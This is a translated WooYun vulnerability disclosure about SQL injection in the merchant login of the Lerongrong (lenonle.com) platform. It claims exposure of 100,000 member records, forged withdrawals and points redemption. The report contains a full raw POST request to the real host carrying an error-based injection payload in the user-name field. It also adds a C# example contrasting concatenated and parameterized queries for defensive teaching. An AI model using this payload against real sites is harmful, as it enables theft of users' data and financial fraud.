
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0139715

Title: Lerongrong (乐融融) SQL injection (leaks 100,000 registered member records / forged balance withdrawals / arbitrary redemption of points-mall items)

Vendor: 杭州乐其儿网络技术有限公司 (Hangzhou Leqier Network Technology Co., Ltd.)

Author: 路人甲

Submitted: 2015-09-08 13:58

Fix deadline: 2015-10-23 14:00

Disclosed: 2015-10-23 14:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org, for questions or help contact [email protected]

Tags: (none)


Vulnerability details

Disclosure status:

2015-09-08: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-10-23: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

About Lerongrong
● Origin of the name "Lerongrong":
Lerongrong (desktop site lenonle.com, mobile site m.lenonle.com) is developed and operated by 杭州乐其儿网络技术有限公司 (Hangzhou Leqier Network Technology Co., Ltd.).
The name "Lerongrong" comes first of all from the founders' positioning of the site's value: to build a new-generation open platform for the free online trading of service-industry products, serving hundreds of millions of people. The inner driving force behind the emergence and continued growth of the service industry is people's pursuit and fulfilment of "happiness". Through the provision and consumption of service products, a new era of a prosperous human society, full of happiness and of harmonious relations between people, is realized. The existence and growth of Lerongrong is precisely a modest contribution to accelerating this goal of human social development.
In June 2011, Hangzhou Leqier Network Technology Co., Ltd. was incorporated in Hangzhou, China's most beautiful city, known for centuries as "paradise on earth". "Lerongrong" is to "paradise on earth" what "paradise on earth" is to humanity's ultimate spiritual home; the three form an inseparable whole.
● Lerongrong's business model:
Put simply, Lerongrong's business model is the BO2O (Bidding Online, from Online to Offline) model, a first in China. The BO2O model gives users a new time-saving, money-saving, worry-free buying experience for non-standardized service products; at the same time, it helps service providers clear their inventory of service products as quickly and cheaply as possible, driving their marginal operating cost to a minimum. It is a rare, advanced business model for the online trading of non-standardized service products.
● Lerongrong's core values:
Only a site that effectively lowers transaction costs for both parties and gives people a good trading experience and a high-quality service experience is a good site that meets market demand; only by seeking the continuous joint growth in value of the consumer as the demand side, the service supplier and the trading platform can the trading platform endure!
● Lerongrong's mission:
While promoting, at low cost, the transformation and upgrading of marketing and management in China's service industry, to give countless consumer members an "autonomous", "fast" and "low-cost" experience of choosing, buying and enjoying cost-effective services, and to raise people's sense of happiness and well-being.

Detailed description:

POST injection at the merchant login page; unexpectedly, the main site and the merchant portal share one database, so all of the data is exposed.
Tested with one account: withdrawals and points redemption are possible.
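The request in the proof section below sends u_name=a%27+and+user%3E0--, which decodes to a' and user>0--. That value only has an effect if the login handler splices the POSTed user name straight into its SQL text; in SQL Server, user returns the current database user name, and comparing it with an integer raises a conversion error that echoes the name back in the page. The following ASP.NET snippet is an added example (not the vendor's code, whose schema and handler are unknown) that puts that concatenating pattern beside a parameterized version. The Merchants table, the u_name and pwd_hash columns, and the stored-hash format are assumptions made for illustration.

```csharp
// Added example (not the vendor's code). Assumed schema: table Merchants with
// columns u_name (nvarchar) and pwd_hash (nvarchar, "base64(salt):base64(pbkdf2)").
using System;
using System.Data;
using System.Data.SqlClient;
using System.Security.Cryptography;

public static class MerchantLogin
{
    // Vulnerable form: request input becomes part of the SQL text.
    // With userName = "a' and user>0--" the statement turns into
    //   SELECT COUNT(*) FROM Merchants WHERE u_name = 'a' and user>0--' AND pwd = '...'
    // so the caller, not the developer, decides what the WHERE clause says.
    public static string BuildVulnerableQuery(string userName, string password)
    {
        return "SELECT COUNT(*) FROM Merchants WHERE u_name = '" + userName +
               "' AND pwd = '" + password + "'";
    }

    // Hardened form: the user name travels as a typed parameter, never as SQL
    // text, so quotes and comment markers in it are plain data. The password
    // is never sent to the database at all; only a salted hash is compared.
    public static bool Authenticate(string connectionString, string userName, string password)
    {
        const string sql = "SELECT pwd_hash FROM Merchants WHERE u_name = @u_name";

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Explicit type and length: no implicit conversion, no oversize input.
            cmd.Parameters.Add("@u_name", SqlDbType.NVarChar, 64).Value = userName;
            conn.Open();
            var stored = cmd.ExecuteScalar() as string;
            if (stored == null)
            {
                return false; // unknown user: same answer as a wrong password
            }
            return VerifyPassword(password, stored);
        }
    }

    // Verifies a PBKDF2 hash stored as "base64(salt):base64(derivedKey)" (assumed format).
    private static bool VerifyPassword(string password, string stored)
    {
        var parts = stored.Split(':');
        if (parts.Length != 2)
        {
            return false;
        }
        byte[] salt = Convert.FromBase64String(parts[0]);
        byte[] expected = Convert.FromBase64String(parts[1]);

        using (var kdf = new Rfc2898DeriveBytes(password, salt, 100000))
        {
            byte[] actual = kdf.GetBytes(expected.Length);

            // Constant-time comparison so timing does not leak how many bytes matched.
            int diff = 0;
            for (int i = 0; i < expected.Length; i++)
            {
                diff |= expected[i] ^ actual[i];
            }
            return diff == 0;
        }
    }

    // Produces the stored form of a new password (used when creating or changing accounts).
    public static string HashPassword(string password)
    {
        byte[] salt = new byte[16];
        using (var rng = new RNGCryptoServiceProvider())
        {
            rng.GetBytes(salt);
        }
        using (var kdf = new Rfc2898DeriveBytes(password, salt, 100000))
        {
            return Convert.ToBase64String(salt) + ":" + Convert.ToBase64String(kdf.GetBytes(32));
        }
    }
}
```

The parameterized query removes the injection; it does not, on its own, address the second point in the report, that the merchant portal and the main site share one database. The database account used by the merchant login should be limited to the tables and operations that login needs, so that a defect in one application cannot read or alter another application's member and balance data.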

Proof of vulnerability:

POST /login.aspx HTTP/1.1
Host: sps.lenonle.com
Content-Length: 3543
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://sps.lenonle.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://sps.lenonle.com/login.aspx
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=fnqeoab5hsy5bp55xcwqzm55; Hm_lvt_f808693f80aab1f05cf0431944db9326=1441610778; Hm_lpvt_f808693f80aab1f05cf0431944db9326=1441610807
__VIEWSTATE=ZVMfuKTfXRdvwVfDVCegQVxih%2BfD29TbXIPlXt2LgcFjU5eEyQ%2BxzgW6eyZw1TmZox6%2BliXgCjnrLucjB87SL7U4fWM2Q2iI8S9%2BGgCAFc0kLN47kArmk8ZnCCYWtjFjA02VMEYrF7e5rPLsKove5rFMz0pVbhC1p0gLJbmrJP3DUCEsQQdHLheaPURSWl2k6fZ3qy%2Fua4BHwxWupXXX9mAxBmAPsJMPVXvWoPlRv0nYEZFpO5bjpOGwmpCmJIufKrBT%2FF8KsXi3vYKj9qfdHQcCoblwPDUS5h1O2NaOCPYkWNI87BY3wAh6Z%2F3RvKpvQ8kj%2BnmUr8FOE2BXFX5w7NJgCwlUXq8VBzhkuvStBN4V5acQ4ZSh%2FIGsc%2BXYJVbORDflTE3FK7cjg1FgMiMGjhhRioOK0EsZUL99fanT7OTVJJeWZPIjSkEG8zx1Bx3GUBBQdXo%2BOH7buHDm5Om8gv9i%2BvgCpGt6b3Wne4LnABy08FpauLUmOYEkHBV3XsvMirWz3ziwOk8fVxBCgJHFLxvgUEiC0Iv%2FRVk3CJjnBJ1lwKQQNfmuM5hYuLv79LNM6rZvbvHTZBIf4qQPvTTt9AlsmiqtRKHj2Fd5HwniOMpz2f4mIseF7PobOJ56528h%2FWTJcu0KoqF51VnOER05CMMrvVRFGhRewHtUCxFA1lO55FLqe0EFMAR%2BtTCQeRoxULEBJvpavTwopdd0aGKM2KBDMe5NH8eyN%2FONpNMOpzAzlX6PDnXFJjblFpP3BH997pZPnsl7TumRQUUUj2oD613QGiz69%2B078jLajH3d1wbJfzQ0LouSFp3Tjn844jbsVOA8Ha8FlpICXDYfx7Pz%2Fe7ccSqSDTJWzusFhXH9Q%2BzWAChIDL3rOVJJ2RGZfDM0c%2FXATBcHsdMx2vlhW6HDfojemVZuRqWLFLHWrUuaI5JiN4%2B37ccakHf%2B3Fs%2B%2BEk27gzN5hhEajCRPc%2FQJYABdARxeEkNdefocbSqLQ3QcprjtZlG97gQo2IyToy2a1%2BUaY0szsAfA66rqHltC7L5fsiaFcOWujYyoHiZUffGIYJpX%2FVinBhALBj5ntkjE%2B%2BqHChEXCy8Ly9HBOm8kSfSdln4iaotpbsS90O4sgFhBgycm1H55J%2BJ4YLw8Y7CJphy9tAAQCpMRYSqE5B4qfMcbDGQgyXk3IV%2BRDQg0WyQSx7RxzxClVJ0e1KPRFGs83o6kS2%2By4WSz8nKukn%2BiulSJutkKrUwdiSddU81ZhxBboQwGZWjSs1%2FADociK9xFqE4MXfMx2ip05h7LGAUqVxdUItuqqJ2IfBKgAUs3IHGAf6WqYDdxyQJaG2WG72S3OWclFwwKFgdr9bs2%2BSBSSvnXiGYWLp%2FubgQOW%2B5HuQkUmGCP7HXlUSiyLow%2BOC6xJxwja4B5bbOXjiDMERC2AyCsPYOKN1lSoXKBb6WzIFc%2BcjhUyYe3CLN9gDhRzBWKOJM5Fj0RUcCXRSFhUGqwYQFHpvHVofSqfby87YwNFQAOaDp%2B65VVueP00BDR192NGqQJwdjdraTVzMjBQI3C5vi0RuD%2BIqbhxLvPULyuQoy0mnjVSrAi1no9jPafSbUBXi0AWZOvhsEzkuaAzZZ2O9bMBKLQsKPLxSZk7kqG95KIAnaWC0QDHXBbSrP2PfKo%2F1BI238%2BPagFfvkknWVr37eBlrzD0Ef3tPpahehxkDgHQ1SxWm6S2QBxJkwweAgDdd0t7eJ3wMdOK%2F13pvVPJSCbhmqYHoUBvZKaLr3lPJ8Ap3M8vhlBBxjIIelYh73AQqPr009GaNzvAP%2FPithkKn87nSwa7JHyDApAenRaYYObybRF1zcChQ028QQfAih%2F7hiYBeyos2BKUKD1Xqp%2F4KmKIfs7LB%2F17Put3No
omnRETYJDOkEYbY8Hqo%2FlRveXrI%2FjkRvfeDVzsq1445V0A%2BGAKG0%2BGslege2upwOg2c0t71gwGjgwsK13N%2BwHYJT8xzEi8UIyXZ1EBZpcvXVXw%2FpwQz2IhAF7e6DHRpIqi6pxqPyN8z6KWEBoJZltkfnnW4DMADZJ6UB9YTaeaqdvWLDuFO8OtP%2Bi0UM7QIzxVlzgrLp%2F7x0lRt2c1IIWnnK5G2snnXmUSHjAPQoIYURvUFPqvYdVT9%2B8AvMuNUzH5TwNgaRgdrrCuptx6bRBisSv3gwKDyTckQTIQZBJcPg07PFObQuBOGtuHkL9YQIVZWNVXfMMR71BOu1ABrdJf4sR9VfXH3hX8EWiR75SjNYxaZcaD8a9nIb01uqemUPCPpaAd%2Fgduo5kqypMo5ddhUx1XDx5GYG2ZP56mOGl8KnVJ1LUaeJoag%2FiXQXz8G8c06T7T6SlsG2JHBINj1hELA%2BqkXvqHqo9IXrgM3teTvfU46m%2FRPmZXguft3KEX%2B3YZiYRXtt0CkgO97FIKZwPTvqvNqkobsgpLBf1LYQ6P3c1nePSw6LmuaGlYTr3gFe9Rkg0uSKynEbbSJAevNp5vIR75FxzfjXRmq25u2ZF19ZgjkOUoeFRNqxU5VZmOq6qVN4jL3SB7cHd7azXpfDMkiZV0sK11Pv5AotENz1vEtwuKg5OXf4vRWsFIYPUJIZiQ4H8HA50bgJEpV4yF7aKIxeLcLCWzZCTIpzpJKznMcpH0HBsoHb4%2Bk9PwGlcbSAzXGxIxIeXy1V%2BAvHs15vcXskTDyvbAoTElz%2BYR%2BaJpCiim57tKG9G9xbNHRqQwvD09V7p%2BphrkDyz%2B7bJ5kMHRN20wbvkyXc8fDM7ASBkfJvhUxm0%2BXWxxCKbN07FCVZF9P7ybLLVYDxx6zaq%2Fd4AJVqT4M0f%2BzdW%2BkVfJu8dX%2F7I0wOGZXnSaiGuR0DLHnchsp0JwIEG%2BE2LqqlSXhlcZJwWJZLL0%2BAcPLnZnD3EvzLrHGgqM5nG7rbm7hUIUXLFhZvsnD98eQPL5ZKTvitacJyZRFzwwruSAd%2B4pmgdjgNkWDhemd3LH3geD4Tdz9Cz7WCRtegXjr3R9sAH0Np%2F49yIm%2BdkOme5iXewoC9wB5Vgh%2B4yE7mxC8PXIFmoHdiPIR5ChlNI84o9IhIcIsjWbqI%2BLZOHpAW31tYPtHuDzSl&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=pgVuf0WO3HlpbHsVXyrY9jOM%2BdhcWaFOLbFEuqlyFFgxjLQN364BQ4dWS4rIj7dDfgZ4ISaN5uYeJ8BSPssMPxyJT9yoABPH0L1QTmJ0ZBXBh3TaOTiC%2F6LkbSATURq4Hovi2uThDjFjeDxD&u_name=a%27+and+user%3E0--&u_pwd=aaaa&txtChkcode=w1px&imagelogin.x=86&imagelogin.y=13

POST request packet

Screenshots (image files not included in this text copy): 搜狗截图15年09月08日1055_1.png, 1111.png, meber.png, 搜狗截图15年09月07日1640_10.png, 10W.png, 5555.png, 125445855.png, judy.png, 469.png, 469手机号.png

Fix recommendation:

Copyright notice: when reproducing, please credit the source, 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively declined

Vulnerability Rank: 15 (WooYun rating)